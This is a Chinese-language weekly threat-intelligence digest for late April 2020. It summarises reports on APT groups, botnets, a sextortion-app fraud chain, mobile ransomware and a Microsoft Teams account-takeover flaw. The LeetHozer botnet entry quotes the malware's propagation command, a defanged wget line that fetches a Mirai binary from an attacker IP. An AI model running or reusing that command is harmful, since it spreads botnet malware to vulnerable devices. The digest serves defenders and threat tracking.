2020.04.23-2020.04.30

　　攻击团伙情报

　　Lazarus APT组织使用西方某航空巨头招聘等信息针对特定国家的定向攻击事件分析

　　Donot APT团伙近期针对周边国家和地区的攻击活动分析

　　PhantomLance：利用应用商店传播的海莲花Android攻击样本分析

　　Gorgon Group组织利用“订单，付款收据”等诱饵投递攻击邮件

　　Nazar：据影子经纪人泄露文件发现的新APT组织

　　Hermit(隐士)APT组织2020年最新攻击活动分析

　　攻击行动或事件情报

　　Outlaw:针对欧洲的新型加密僵尸网络

　　窥探裸聊诈骗背后黑色产业链的一角

　　恶意代码情报

　　精准投放Tsunami僵尸网络和“魔铲”挖矿木马的行动分析

　　UU页游助手升级通道传播独狼Rootkit病毒，已感染上万台电脑

　　Black Rose Lucy勒索软件升级换代

　　LeetHozer Botnet分析报告

　　漏洞相关情报

　　Microsoft Teams中的帐户接管漏洞，利用恶意的GIF可导致子域接管

　　其他相关

　　ESET：2020第一季度威胁报告

攻击团伙情报

　　1、Lazarus APT组织使用西方某航空巨头招聘等信息针对特定国家的定向攻击事件分析

　　披露时间：2020年04月30日

　　情报来源：

　　https://mp.weixin.qq.com/s/y1j5K0y38cnSPzRLbVvuFw

　　相关信息：

　　LazarusAPT组织是疑似具有东北亚背景的APT团伙，该组织攻击活动最早可追溯到2007年，其早期主要针对韩国、美国等政府机构，以窃取敏感情报为目的。自2014年后，该组织开始针对全球金融机构、虚拟货币交易所等为目标，进行以敛财为目的的攻击活动。

　　据公开情报显示，2014 年索尼影业遭黑客攻击事件，2016 年孟加拉国银行数据泄露事件，2017年美国国防承包商、美国能源部门及英国、韩国等比特币交易所被攻击等时间都出自Lazarus之手。

　　近日，红雨滴团队和奇安信APT实验室又监测到该组织利用敏感国家外交关系，西方某航空航天巨头招聘等信息开展新一轮攻击活动。此次活动中，该组织采用模板注入的方式从远程服务器获取带有恶意宏的文档执行，从而绕过杀软检测，值得注意的是第一次上传VirusTotal时仅有一家杀软成功检出。

　　2、Donot APT团伙近期针对周边国家和地区的攻击活动分析

　　披露时间：2020年04月28日

　　情报来源：

　　https://mp.weixin.qq.com/s/e47ui2Gl0jqQSz6F12bxHA

　　相关信息：

　　Donot“肚脑虫”(APT-C-35)是疑似具有南亚背景的APT组织，其主要以周边国家的政府机构为目标进行网络攻击活动，通常以窃密敏感信息为目的。该组织具备针对Windows与Android双平台的攻击能力。

　　近期，奇安信红雨滴和奇安信APT实验室在日常的跟踪过程中，再次监测到该组织开展了新一轮攻击活动。此次攻击活动中，该组织采用的技战术手法并未发生大的变化，只是在代码中做了些轻微改动：例如下载器中将字符串简单加密处理、Android样本中将C2等信息简单加密处理等。

　　3、PhantomLance：利用应用商店传播的海莲花Android攻击样本分析

　　披露时间：2020年04月29日

　　情报来源：

　　https://securelist.com/apt-phantomlance/96772/

　　相关信息：

　　Dr.WEB在2019年披露了一个存在于Google Play商店中的后门木马，该木马较之常规恶意软件更为复杂。卡巴斯基基于该报告追溯到一个自2015年至今长期活跃的攻击活动，并将其命名为“PhantomLance”。

　　该攻击活动主要通过包括Google Play在内的Android应用商店进行传播，通过伪装成浏览器清理工具等诱导受害者下载安装。根据卡巴斯基研究表明，该恶意木马至今已迭代3个版本，主要以窃取受害者设备上的敏感信息为目的。攻击活动与海莲花存在重叠，恶意样本与海莲花 Android样本在代码结构上存在较大的相似度，同时也与海莲花 MacOs后门存在相同的命名方式。

　　根据卡巴斯基数据显示，自2016年起，印度、越南、孟加拉国‘、印度尼西亚等南亚国家大约有300台Android设备被攻击。

　　4、Gorgon Group组织利用“订单，付款收据”等诱饵投递攻击邮件

　　披露时间：2020年04月27日

　　情报来源：

　　https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw

　　相关信息：

　　近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码，宏代码会启动mshta执行保存在pastebin上的远程脚本代码，且pastebin URL是由Bitly生成的短链接。

　　此次攻击的主要特点为恶意代码保存在托管平台pastebin上：包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马，然后将其注入指定进程执行，RAT会不定期更换，当前获取的RAT 木马是Azorult窃密木马。

　　对比分析发现，攻击者注册的pastebin账号为”lunlayloo”( 创建于2019年10月)，与另一个账号“hagga”(创建于2018年12月)对应攻击事件中使用的TTP高度相似，因此腾讯威胁情报中旬认为两者属于同一家族ManaBotnet，并且”lunlayloo”可能为“hagga”的后继者。

　　有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group，一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击，包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。

　　5、Nazar：据影子经纪人泄露文件发现的新APT组织

　　披露时间：2020年04月22日

　　情报来源：

　　https://www.epicturla.com/blog/the-lost-nazar

　　相关信息：

　　2017年，”影子经纪人”披露了一系列黑客工具，其中令威胁分析人员感兴趣的是SIGS.py,该文件是NSA用于检索其余APT组织的扫描程序，至今仍有15个组织未被安全厂商确认。

　　近期，在OPCDE网络安全峰会上，安全研究人员披露了其关于SIG37的研究，该安全研究人员称SIG37对应的组织疑似来自伊朗，对应的恶意软件中有“khzer”一词，据称该词在波斯语中意为监督，监视。因此，研究人员将该组织命名为Nazar.

　　6、Hermit(隐士)APT组织2020年最新攻击活动分析

　　披露时间：2020年04月24日

　　情报来源：

　　https://mp.weixin.qq.com/s/Gukd2lNr9lE8fluG4bFfSw

　　相关信息：

　　两年前，腾讯安全威胁情报中心曝光了SYSCON/SANNY木马的活动情况，并且根据关联分析确定跟KONNI为同一组织所为。该组织的攻击对象包括与朝鲜半岛相关的非政府组织、政府部门、贸易公司、新闻媒体等。

　　SYSCON/SANNY木马是一个非常有特色的远程控制木马，通过ftp协议来进行C&C控制，该后门的主要攻击目标为朝鲜半岛相关的重要政治人物或者要害部门，偶尔也会针对东南亚等国进行攻击。该活动自2017年下半年开始活跃，并且对多个目标进行了攻击活动。被曝光后，该组织活动没有任何减弱的迹象。腾讯安全威胁情报中心根据该组织的特点，在2018年12月将其命名为“Hermit(隐士)”。

　　2020年，“Hermit(隐士)”APT组织依然保持较高的活跃度，攻击方式和木马行为上也有了较大的更新，因此腾讯威胁情报中旬对近期的攻击活动做一个整理，并对木马的一些更新情况做一个详细分析汇总。

攻击行动或事件情报

　　1、Outlaw:针对欧洲的新型加密僵尸网络

　　披露时间：2020年04月28日

　　情报来源：

　　https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/

　　相关信息：

　　Outlaw是2018年趋势科技披露的僵尸网络团伙，该团伙早期主要针对汽车和金融行业。通常使用暴力破解和SSH漏洞实现对目标系统的远程访问。

　　近期，Yoroi在日常的监测活动中，拦截了尝试攻击其客户的Linux恶意软件，经分析发现，该恶意软件是著名的“Shellbot”变体，“Shellbot”是Outlaw团伙常用的恶意软件。捕获的变体与perl后门捆绑，其中包括SSH扫描器。该攻击活动主要针对全球范围内具备IRC服务器和新Moneroc池的组织。

　　2、窥探裸聊诈骗背后黑色产业链的一角

　　披露时间：2020年04月28日

　　情报来源：

　　https://ti.qianxin.com/blog/articles/peeking-into-the-corner-of-the-black-industry-chain-behind-naked-chat-scams

　　相关信息：

　　近日，奇安信病毒响应中心在日常黑产挖掘过程中发现有人以裸聊的形式在社交网络上传播某种视频直播软件，该软件在提供正常直播内容的同时还会在暗地里收集用户数据，而受害者往往控制不住自己的欲望，导致个人信息被泄露，严重的甚至被敲诈钱财。

　　该APK样本经过加固，输入手机号和正确的推广码后才会执行恶意代码将相关信息上传到服务器上。所以该样本免杀效果非常好，很难被探测到，经过后续扩展发现这是一套完整的裸聊诈骗框架，已经被大量的黑产团伙使用。

　　近几年，随着多种新型网络诈骗兴起，前有博彩杀猪盘在东南亚搞的风生水起，后有网贷，校园贷在内地危害人间，造成了当事人倾家荡产、自杀等人间惨剧，严重影响了社会秩序。而本文让我们来聊一聊裸聊与诈骗。

　　任何事物都会不断的发展进化，以适应当下的环境，裸聊也不例外。早期裸聊的形式较为简单，黑产团伙建立色情站点，会先通过“试聊”的方式消除用户的顾虑，几分钟后弹出对话框提示“账户余额不足”需要充值才能继续聊天，之后还会提供VIP会员服务，加入VIP后可以享受女主播一对一裸聊服务和上门服务。

　　到了2019年黑产们改进了裸聊的形式，并结合大火的“杀猪盘”模式，从原来只弹框的被动接触，变成了现在的主动和被动相结合的形式，主动在社交网络上与你发起会话进行聊天，使用相关《话术》诱导你进行裸聊，上钩之后会发你app的下载二维码以及对应的邀请码。裸聊App会获取你的通讯录并录制裸聊时的视频，裸聊结束后会对你进行恐吓和勒索。

恶意代码情报

　　1、精准投放Tsunami僵尸网络和“魔铲”挖矿木马的行动分析

　　披露时间：2020年04月24日

　　情报来源：

　　https://mp.weixin.qq.com/s/vAq_8LL0GlS-DLi5KNZJ9g

　　相关信息：

　　近日，安天CERT联合哈尔滨工业大学网络安全响应组通过网络安全监测发现了一起僵尸网络和挖矿木马事件，该事件针对Linux系统，包含服务器和智能设备。攻击者配置了一个IP列表，如果目标主机外网IP在列表中则下载运行Tsunami僵尸程序，如果目标主机外网IP不在列表中则下载运行“魔铲”挖矿木马，IP列表共8487条，全球范围内涉及政府部门、金融行业、互联网企业、媒体、运营商等多种目标，国内也有大量目标。

　　安天CERT分析推测，IP列表中的对应机构的特点是网络流量相对较大，因此被攻击者用来做僵尸网络的组成部分;IP列表外的，网络流量可能相对较小，因此被攻击者用来挖矿。

　　被感染的Linux系统的计划任务中，存在一个每隔一段时间执行一次下载和运行update.sh脚本的任务。该脚本功能是获取计算机信息(用户id、处理器架构和公网IP)，连接网络读取一个IP列表(server.txt)，判断主机的公网IP是否存在于该IP列表中，如果存在则准备下载组成僵尸网络的僵尸程序运行，如果不存在则准备下载挖矿木马运行。

　　2、UU页游助手升级通道传播独狼Rootkit病毒，已感染上万台电脑

　　披露时间：2020年04月28日

　　情报来源：

　　https://mp.weixin.qq.com/s/MchLCxba26Z0KMZthv-uLA

　　相关信息：

　　腾讯安全威胁情报中心检测发现，UU页游助手通过其软件升级通道，传播独狼Rootkit病毒。独狼Rootkit家族是一个长期依赖第三方Ghost镜像传播的恶性锁主页后门病毒。本次由于通过借助UU页游助手推广渠道流氓传播，使得独狼Rootkit病毒在短时间内感染量激增，受害网民已过万，分布在全国各地。中毒电脑会出现莫名其妙安装不请自来的软件、频繁弹出广告、浏览器主页被锁定等现象。

　　3、Black Rose Lucy勒索软件升级换代

　　披露时间：2020年04月28日

　　情报来源：

　　https://research.checkpoint.com/2020/lucys-back-ransomware-goes-mobile/

　　相关信息：

　　Black Rose Lucy是Check Point2018年披露的恶意软件，该恶意软件早期是针对Android平台的僵尸网络，近期，Check Point监测发现，该恶意软件新增了勒索功能，执行后，将对受害者设备文件进行加密，并声称是来自美国联邦调查局的，指控受害者设备上拥有非法的色情内容，并已经相关犯罪数据上传至FBI,需要受害者交付赎金以免受牢狱之灾。

　　4、LeetHozer Botnet分析报告

　　披露时间：2020年04月28日

　　情报来源：

　　https://blog.netlab.360.com/the-leethozer-botnet/

　　相关信息：

　　近期，360 NetLab捕获了一个可疑的样本，部分杀毒引擎将其识别为Mirai，但是其网络流量却不符合Mirai的特征，这引起了注意，经分析，这是一个复用了Mirai的Reporter，Loader机制，重新设计了加密方法以及C2通信协议的Bot程序。

　　这个Bot程序之所以能在众多变种脱颖而出，一是因为它独特的的加密方法，严谨的通信协议;二是因为在溯源过程中，360 NetLab发现它很有可能隶属于Moobot团伙而且正在迭代开发中。因为传播过程中使用H0z3r字串(/bin/busybox wgethttp://37[.49.226.171:80/bins/mirai.m68k -O - > H0z3r;)，360 NetLab将其命名为LeetHozer。目前观测到感染目标主要是雄迈旗下的固件版本早于2017年5月的H.264设备和部分固件版本晚于2017年5月H.265设备。

　　1、Microsoft Teams中的帐户接管漏洞，利用恶意的GIF可导致子域接管

　　披露时间：2020年4月27日

　　情报来源：

　　https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/

　　相关信息：

　　随着越来越多的企业从远程位置开展业务，攻击者将精力集中在利用关键技术(例如Zoom和Microsoft Teams)上，这些技术是公司及其员工保持联系的基础.

　　Cyberark安全研究人员发现Microsoft Teams中的子域接管漏洞，攻击者可使用恶意GIF来抓取用户的数据，并最终接管组织中的所有Teams帐户。此漏洞将影响使用Teams桌面或Web浏览器版本的用户。

其他相关

　　1、ESET：2020第一季度威胁报告

　　披露时间：2020年04月29日

　　情报来源：

　　https://www.welivesecurity.com/2020/04/29/eset-threat-report-q12020/

　　相关信息：

　　2020年第一季度，COVID-19爆发，使大部分地区处于封锁状态，但ESET安全研究人员并没有停止威胁研究工作。在第一季度，ESET分析了Stantinko中的混淆技术，详细介绍了针对巴西的银行木马Guildma。并披露了Turla针对亚美尼亚的水坑攻击等。

　　与上一季度相比，2020第一季度中挖矿和Android恶意软件有所下降，其他类型威胁则持上升趋势，特别使Web相关的攻击次数涨幅最大，这或许与新冠病毒的爆发相关。（来源：奇安信威胁情报中心）